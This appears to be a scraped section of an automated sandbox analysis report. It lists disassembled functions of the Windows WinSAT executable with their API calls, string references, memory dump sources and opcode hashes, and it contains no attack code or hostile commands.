                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ByteCharMultiWide___lc_codepage_func___lc_handle_func___mb_cur_max_func_errno
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1734677270-0
                                                                                                                                                                                              • Opcode ID: 0965f794a4c49facf33eec3cb1a99bb24359c4207a23ff23b6771eb46d1373e6
                                                                                                                                                                                              • Instruction ID: c1a1840d8b7d1c8f42eb25c19b0a296f5095512b9ac76167d830f2721a4aeabb
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0965f794a4c49facf33eec3cb1a99bb24359c4207a23ff23b6771eb46d1373e6
                                                                                                                                                                                              • Instruction Fuzzy Hash: 7311423390878286E750AF51E84433DF7A1FB847A4FA48135E68A57A98DFFCE544CB20
                                                                                                                                                                                              Function 00007FF7810A5150 Relevance: 7.5, APIs: 5, Instructions: 46COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: __pctype_func$___lc_codepage_func___lc_handle_funcmalloc
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3627676911-0
                                                                                                                                                                                              • Opcode ID: 2853a794b7b2971c23ad2a817e25b057eb577ff5583758930523b79d8ab70bcf
                                                                                                                                                                                              • Instruction ID: d5c90d41f4cc6e343d82d32519ae04edd7994bc9eaf01cf8b046bff92e692a74
                                                                                                                                                                                              • Opcode Fuzzy Hash: 2853a794b7b2971c23ad2a817e25b057eb577ff5583758930523b79d8ab70bcf
                                                                                                                                                                                              • Instruction Fuzzy Hash: 49210C66D08B84C3E7019F38C9052787760FBA9B49F65E224CE9916222EF79F1E9C750
                                                                                                                                                                                              Function 00007FF780FDC508 Relevance: 7.5, APIs: 5, Instructions: 39memoryCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetProcessHeap.KERNEL32(?,?,?,?,00007FF780FDC5F9,?,?,00000683,00007FF780FDC77C), ref: 00007FF780FDC50C
                                                                                                                                                                                              • HeapAlloc.KERNEL32(?,?,?,?,00007FF780FDC5F9,?,?,00000683,00007FF780FDC77C), ref: 00007FF780FDC526
                                                                                                                                                                                              • memset.MSVCRT(?,?,?,?,00007FF780FDC5F9,?,?,00000683,00007FF780FDC77C), ref: 00007FF780FDC58B
                                                                                                                                                                                              • SetCriticalSectionSpinCount.KERNEL32(?,?,?,?,00007FF780FDC5F9,?,?,00000683,00007FF780FDC77C), ref: 00007FF780FDC59C
                                                                                                                                                                                              • SetCriticalSectionSpinCount.KERNEL32(?,?,?,?,00007FF780FDC5F9,?,?,00000683,00007FF780FDC77C), ref: 00007FF780FDC5B4
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CountCriticalHeapSectionSpin$AllocProcessmemset
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2926470208-0
                                                                                                                                                                                              • Opcode ID: 28e185f25a5b7357669d2e6fd8c9e3f819a9931e226fc136fc2ddd00e01e7090
                                                                                                                                                                                              • Instruction ID: 799793712053406a307a41a3328242d47681c4edff39f27a2d6ae6ba20a1b928
                                                                                                                                                                                              • Opcode Fuzzy Hash: 28e185f25a5b7357669d2e6fd8c9e3f819a9931e226fc136fc2ddd00e01e7090
                                                                                                                                                                                              • Instruction Fuzzy Hash: 76115225E19A0286EB04A711F814376BBA0FF49704FF5C135C54E467A4DFBDB04ACBA0
                                                                                                                                                                                              Function 00007FF780FA8BE8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 111COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: StringType$memcpy
                                                                                                                                                                                              • String ID: H
                                                                                                                                                                                              • API String ID: 240754450-2852464175
                                                                                                                                                                                              • Opcode ID: 6e0e6d407a48838cbcdbf26fd41bf9d7f626e0df24fe5ea635e5f2768d9ce1d2
                                                                                                                                                                                              • Instruction ID: 493fbb218ca43edf3635a8914347489c9d3a91439f0aaae066f75159e9bf3795
                                                                                                                                                                                              • Opcode Fuzzy Hash: 6e0e6d407a48838cbcdbf26fd41bf9d7f626e0df24fe5ea635e5f2768d9ce1d2
                                                                                                                                                                                              • Instruction Fuzzy Hash: 7C416426B0DA4685DE10AF12E4042BDE721FF94FD8F949032DA4D077E5DEACE456C750
                                                                                                                                                                                              Function 00007FF780FA8D78 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 104COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: StringType$memcpy
                                                                                                                                                                                              • String ID: H
                                                                                                                                                                                              • API String ID: 240754450-2852464175
                                                                                                                                                                                              • Opcode ID: fa48544147f09a3a598fdac1cfae0d2e592d03264aff51cf943d245871f1a51b
                                                                                                                                                                                              • Instruction ID: a2b65085f6ccb0bbeab30d9b633aea5494128ed36a18c3319b1f0d9dfbf4c6c1
                                                                                                                                                                                              • Opcode Fuzzy Hash: fa48544147f09a3a598fdac1cfae0d2e592d03264aff51cf943d245871f1a51b
                                                                                                                                                                                              • Instruction Fuzzy Hash: 03418262A0CB8285EA10AFA2E5441AAE761FF45BC8FA4D031DB4C177D5DE7CF462D360
                                                                                                                                                                                              Function 00007FF780FB26F0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 93COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrowstd::bad_exception::bad_exception
                                                                                                                                                                                              • String ID: str is null
                                                                                                                                                                                              • API String ID: 1480402491-2182108151
                                                                                                                                                                                              • Opcode ID: 89a3b36bececa1c9614a28604d2885fcac3b6534293562865f362391b980c74e
                                                                                                                                                                                              • Instruction ID: 11950fb40f6955a18aac6b0a73bfeacd0edc5c4699deb0a1ffa7a3ab6093c19d
                                                                                                                                                                                              • Opcode Fuzzy Hash: 89a3b36bececa1c9614a28604d2885fcac3b6534293562865f362391b980c74e
                                                                                                                                                                                              • Instruction Fuzzy Hash: 6F31E222E0CA4281EA64AB25E460279B360FF84B90FF49231EA6D077D5CF6CF501CB10
                                                                                                                                                                                              Function 00007FF780FAFF64 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrow$FolderPath
                                                                                                                                                                                              • String ID: Performance\WinSAT\DataStore
                                                                                                                                                                                              • API String ID: 1383251882-1130088143
                                                                                                                                                                                              • Opcode ID: aa6447459f28100ce6b86b82429d6dbe9674982c7cf9718ab5fda6f29911628f
                                                                                                                                                                                              • Instruction ID: 49ec1d2b9c1522e07470cf51eec1d39ca83d12dbce5986ddbc5b85c726d5f9df
                                                                                                                                                                                              • Opcode Fuzzy Hash: aa6447459f28100ce6b86b82429d6dbe9674982c7cf9718ab5fda6f29911628f
                                                                                                                                                                                              • Instruction Fuzzy Hash: 82219162F1C64286EB04BB16E891179A7A0BF45784FF0A031EA0E477D9DE6CF4A1C720
                                                                                                                                                                                              Function 00007FF780FABDC8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 73COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: StringType
                                                                                                                                                                                              • String ID: H$H
                                                                                                                                                                                              • API String ID: 4177115715-136785262
                                                                                                                                                                                              • Opcode ID: ec97a0d4b11f3b6270374d10a392fe96b836c212539f60c41762d0d117972c29
                                                                                                                                                                                              • Instruction ID: 8c4a9c3c0767bf8c87914a6aceb106691a62cd6ad47e655b099ed0f73b8bea85
                                                                                                                                                                                              • Opcode Fuzzy Hash: ec97a0d4b11f3b6270374d10a392fe96b836c212539f60c41762d0d117972c29
                                                                                                                                                                                              • Instruction Fuzzy Hash: DE215E66A0C68182EB606B52E4403F9E7A1FF44BA8FA49231DF88077C5DB6CE955C760
                                                                                                                                                                                              Function 00007FF780FDB218 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72registryCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CloseOpenQueryValue
                                                                                                                                                                                              • String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinSAT
                                                                                                                                                                                              • API String ID: 3677997916-3888772845
                                                                                                                                                                                              • Opcode ID: bd52aa640df30cb8abac2876f436bbbe94a477b267101b261ad24f255e209804
                                                                                                                                                                                              • Instruction ID: 041a4d46b003757b2d3629eabbbe67b34f771b6995763c4fcc8752eea4cf4e83
                                                                                                                                                                                              • Opcode Fuzzy Hash: bd52aa640df30cb8abac2876f436bbbe94a477b267101b261ad24f255e209804
                                                                                                                                                                                              • Instruction Fuzzy Hash: 4721933661CB42C6E7519F16E44426EF6A0F788B91FA48130DE4D03B94DF78E406CB10
                                                                                                                                                                                              Function 00007FF780FAEEEC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: iswdigit$StringType
                                                                                                                                                                                              • String ID: H
                                                                                                                                                                                              • API String ID: 3141519268-2852464175
                                                                                                                                                                                              • Opcode ID: 3dfabf3f60f5ae887f0728852823272a1ce887f1a70378dba89afae5d3730357
                                                                                                                                                                                              • Instruction ID: 195887ebfd589ab3f6285c230d4bba388296c21018fefe13836cdaefa17a8e24
                                                                                                                                                                                              • Opcode Fuzzy Hash: 3dfabf3f60f5ae887f0728852823272a1ce887f1a70378dba89afae5d3730357
                                                                                                                                                                                              • Instruction Fuzzy Hash: F921D336A08642DAE7105F12A40417DFBA1FB56B98FA59035DF9D037D4DB3CE855CB20
                                                                                                                                                                                              Function 00007FF780FA8148 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrowstd::bad_exception::bad_exception
                                                                                                                                                                                              • String ID: str is null
                                                                                                                                                                                              • API String ID: 1480402491-2182108151
                                                                                                                                                                                              • Opcode ID: a8442d5dbe28d60fbb6ed46b2e01c46eb7ef18893fc3c5e54f07f07c9b7955dc
                                                                                                                                                                                              • Instruction ID: f25fad0eef9076122cf7f5c69047cd21c120486649cfdc46560ec2648a5d061d
                                                                                                                                                                                              • Opcode Fuzzy Hash: a8442d5dbe28d60fbb6ed46b2e01c46eb7ef18893fc3c5e54f07f07c9b7955dc
                                                                                                                                                                                              • Instruction Fuzzy Hash: 94110661B18A4641EF24E726E8213B6E321BF44790FF09035DA9D077D5EEACF105C710
                                                                                                                                                                                              Function 00007FF780FAAF24 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrowstd::bad_exception::bad_exception
                                                                                                                                                                                              • String ID: s is null
                                                                                                                                                                                              • API String ID: 1480402491-2156393446
                                                                                                                                                                                              • Opcode ID: c9eef88f8bc6e219294b6a5fcab215794d4ff0f6cb596736d56d34f1f09b8cd0
                                                                                                                                                                                              • Instruction ID: 6c60aba7704d3aa277ea705e0e2d5f66cfc26140e6e19d2d36e80b4e4c6a9ce7
                                                                                                                                                                                              • Opcode Fuzzy Hash: c9eef88f8bc6e219294b6a5fcab215794d4ff0f6cb596736d56d34f1f09b8cd0
                                                                                                                                                                                              • Instruction Fuzzy Hash: 051103A1B1CA4685EE28E716E8213B9B320BF80390FF09131E69E077D5DF6CE008C750
                                                                                                                                                                                              Function 00007FF780FAACB8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrowstd::bad_exception::bad_exception
                                                                                                                                                                                              • String ID: str is null
                                                                                                                                                                                              • API String ID: 1480402491-2182108151
                                                                                                                                                                                              • Opcode ID: 4173635ea93c2e2a64cc8b562fe1925c94c03b98bd21390a548798ac8aad7f06
                                                                                                                                                                                              • Instruction ID: e2b07c16aa0a123da2ca9e896b3907410dca1edba0f9e97e0c48a8d60e11a7af
                                                                                                                                                                                              • Opcode Fuzzy Hash: 4173635ea93c2e2a64cc8b562fe1925c94c03b98bd21390a548798ac8aad7f06
                                                                                                                                                                                              • Instruction Fuzzy Hash: 951127A1E1C64741EE24B725E8213B9E320BF513E0FF09135E59D0A7D6EE9CE248C710
                                                                                                                                                                                              Function 00007FF780FDB318 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43registryCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CloseOpenValue
                                                                                                                                                                                              • String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinSAT
                                                                                                                                                                                              • API String ID: 779948276-3888772845
                                                                                                                                                                                              • Opcode ID: f3d1c174ebb885dcdeaa3b67446d309677e72ba34880c0f3e89c459e61b63fde
                                                                                                                                                                                              • Instruction ID: 33415465bb8130d2596150a9376134f33cf049f166f983d1a364d15c9a25d78e
                                                                                                                                                                                              • Opcode Fuzzy Hash: f3d1c174ebb885dcdeaa3b67446d309677e72ba34880c0f3e89c459e61b63fde
                                                                                                                                                                                              • Instruction Fuzzy Hash: 06118536618B8287D7108F24E944969FBA8F788BE0BA18230DE6D43B58DF78D951CB00
                                                                                                                                                                                              Function 00007FF780FE420C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24libraryloaderCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AddressProc
                                                                                                                                                                                              • String ID: BrandingFormatString$BrandingLoadString
                                                                                                                                                                                              • API String ID: 190572456-1859805997
                                                                                                                                                                                              • Opcode ID: 1ad4134344d69225ad64176de98e43d4db8e59d1d52fa24a5de86a28017e7a57
                                                                                                                                                                                              • Instruction ID: bd304a397951b4645e9d3e2c2384f494937d2ed96e775bd280a861145fb3c383
                                                                                                                                                                                              • Opcode Fuzzy Hash: 1ad4134344d69225ad64176de98e43d4db8e59d1d52fa24a5de86a28017e7a57
                                                                                                                                                                                              • Instruction Fuzzy Hash: 21F01C26E1AF02C2EF45AB61E854074B7A0FF49B54BA99134CA4D4A354EF7CE494CB20
                                                                                                                                                                                              Function 00007FF780F9B424 Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 217COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ErrorLast
                                                                                                                                                                                              • String ID: base\winsat\exe\main.cpp
                                                                                                                                                                                              • API String ID: 1452528299-1001986530
                                                                                                                                                                                              • Opcode ID: 113278e9128854c4afe648a32f32156155437bae33c5dab3dcc6de4a0107c28c
                                                                                                                                                                                              • Instruction ID: 541d0e9fffe1aac7a47b767c48cec354e975ed80314211f0100a491420c2e787
                                                                                                                                                                                              • Opcode Fuzzy Hash: 113278e9128854c4afe648a32f32156155437bae33c5dab3dcc6de4a0107c28c
                                                                                                                                                                                              • Instruction Fuzzy Hash: 2D819E22B1D64282EE50FB16E9102B9E3A1BF85B94FA49031EE4E477D9DE7CF441C720
                                                                                                                                                                                              Function 00007FF780FD7670 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 174COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
